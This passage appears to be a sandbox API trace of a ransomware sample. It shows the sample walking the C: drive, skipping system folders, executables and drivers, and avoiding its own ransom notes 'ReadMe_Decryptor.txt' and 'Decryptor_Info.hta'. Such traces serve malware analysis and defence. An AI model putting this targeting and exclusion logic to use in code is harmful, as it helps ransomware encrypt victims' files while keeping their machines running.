[0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\ProgramData") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Program Files") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Windows") returned -1 [0106.467] lstrcmpiW (lpString1="C:\\Boot\\zh-TW", lpString2="C:\\Program Files (x86)") returned -1 [0106.467] lstrcatW (in: lpString1="C:\\Boot\\zh-TW", lpString2="\\" | out: lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0106.467] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0106.467] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-TW\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c48 [0106.467] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.468] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.468] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.468] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.468] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.468] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.468] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.468] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.468] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.468] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.468] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.468] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.468] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.468] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7296b0 [0106.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b02a0 [0106.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7296b0 | out: hHeap=0x6d0000) returned 1 [0106.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b04e0 [0106.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0106.469] FindNextFileW (in: hFindFile=0x758c48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.469] FindClose (in: hFindFile=0x758c48 | out: hFindFile=0x758c48) returned 1 [0106.469] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.469] FindClose (in: hFindFile=0x72a788 | out: hFindFile=0x72a788) returned 1 [0106.471] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0106.471] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0106.471] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0106.471] lstrcmpiW (lpString1="bootmgr", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.471] lstrcmpiW (lpString1="bootmgr", lpString2="Decryptor_Info.hta") returned -1 [0106.471] PathFindExtensionW (pszPath="bootmgr") returned="" [0106.472] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0106.472] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0106.472] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0106.472] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0106.472] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0106.472] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0106.472] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0106.472] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0106.472] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.472] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Decryptor_Info.hta") returned -1 [0106.472] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0106.472] lstrcmpiW (lpString1=".BAK", lpString2=".exe") returned -1 [0106.472] lstrcmpiW (lpString1=".BAK", lpString2=".sys") returned -1 [0106.472] lstrcmpiW (lpString1=".BAK", lpString2=".lnk") returned -1 [0106.472] lstrcmpiW (lpString1=".BAK", lpString2=".dll") returned -1 [0106.472] lstrcmpiW (lpString1=".BAK", lpString2=".msi") returned -1 [0106.472] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0106.472] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0106.473] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0106.581] lstrlenW (lpString="Config.Msi") returned 10 [0106.581] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Windows") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\ProgramData") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.581] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Intel") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\msys32") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Qt") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\ProgramData") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Program Files") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Windows") returned -1 [0106.582] lstrcmpiW (lpString1="C:\\Config.Msi", lpString2="C:\\Program Files (x86)") returned -1 [0106.582] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0106.582] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0106.582] FindFirstFileExW (in: lpFileName="C:\\Config.Msi\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758cc8 [0106.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.582] FindNextFileW (in: hFindFile=0x758cc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.585] FindNextFileW (in: hFindFile=0x758cc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0106.585] FindClose (in: hFindFile=0x758cc8 | out: hFindFile=0x758cc8) returned 1 [0106.585] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0106.585] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0106.585] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0106.585] lstrlenW (lpString="Documents and Settings") returned 22 [0106.585] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0106.585] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Windows") returned -1 [0106.585] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.585] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\ProgramData") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Intel") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\msys32") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Qt") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\ProgramData") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Program Files") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Windows") returned -1 [0106.586] lstrcmpiW (lpString1="C:\\Documents and Settings", lpString2="C:\\Program Files (x86)") returned -1 [0106.586] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0106.586] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0106.586] FindFirstFileExW (in: lpFileName="C:\\Documents and Settings\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0xffffffff [0106.588] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\", lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 0xffffffff [0106.589] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0106.589] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0106.589] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0106.589] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.589] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Decryptor_Info.hta") returned 1 [0106.589] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0106.589] lstrcmpiW (lpString1=".sys", lpString2=".exe") returned 1 [0106.589] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0106.589] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0106.589] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0106.589] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0106.589] lstrlenW (lpString="MSOCache") returned 8 [0106.589] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Windows") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\ProgramData") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Intel") returned 1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\msys32") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Qt") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\ProgramData") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Program Files") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Windows") returned -1 [0106.590] lstrcmpiW (lpString1="C:\\MSOCache", lpString2="C:\\Program Files (x86)") returned -1 [0106.590] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0106.590] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0106.590] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758cc8 [0106.591] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.591] FindNextFileW (in: hFindFile=0x758cc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.593] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.593] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.593] FindNextFileW (in: hFindFile=0x758cc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0106.593] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0106.593] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0106.594] lstrlenW (lpString="All Users") returned 9 [0106.594] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="All Users" | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Windows") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\ProgramData") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Intel") returned 1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\msys32") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Qt") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\ProgramData") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Program Files") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Windows") returned -1 [0106.594] lstrcmpiW (lpString1="C:\\MSOCache\\All Users", lpString2="C:\\Program Files (x86)") returned -1 [0106.594] lstrcatW (in: lpString1="C:\\MSOCache\\All Users", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\") returned="C:\\MSOCache\\All Users\\" [0106.595] lstrlenW (lpString="C:\\MSOCache\\All Users\\") returned 22 [0106.595] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758d08 [0106.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.723] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.770] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0106.770] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0106.770] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0106.770] lstrlenW 